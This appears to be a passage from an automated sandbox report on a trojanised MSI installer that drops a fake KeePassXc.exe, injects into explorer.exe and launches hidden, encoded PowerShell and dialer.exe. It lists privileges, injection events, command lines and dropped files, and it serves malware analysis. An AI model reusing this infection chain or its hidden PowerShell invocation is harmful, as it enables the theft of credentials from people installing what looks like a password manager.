Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3524 wrote to memory of 1576 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1576 wrote to memory of 72 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3524 wrote to memory of 1496 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 1496 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 1080 wrote to memory of 2416 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1080 wrote to memory of 3692 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C4246E35669DDEF460F00052F5831FC6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4346.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4343.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4344.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4345.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe

"C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e <encoded command elided>

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1496 -ip 1496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 924

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1080 -ip 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 1080 -ip 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1780

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1080 -ip 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1776

Network


Files

C:\Windows\Installer\MSI41DB.tmp

C:\Windows\Installer\MSI42F9.tmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tx4xnijq.sff.ps1

C:\Users\Admin\AppData\Local\Temp\pss4346.ps1

C:\Users\Admin\AppData\Local\Temp\scr4344.ps1

C:\Users\Admin\AppData\Local\Temp\msi4343.txt

C:\Config.Msi\e574103.rbs

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe

C:\Windows\Installer\e574100.msi

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Network.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Gui.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgpg-error-0.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuin68.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libyubikey-0.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libzstd.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libjson-c-2.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpcre2-16-0.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuuc68.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Widgets.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libdouble-conversion.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libwinpthread-1.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\zlib1.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libykpers-1-1.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libsodium-23.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libquazip5.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Svg.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Core.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Concurrent.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libqrencode.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcrypt-20.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libstdc++-6.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libssp-0.dll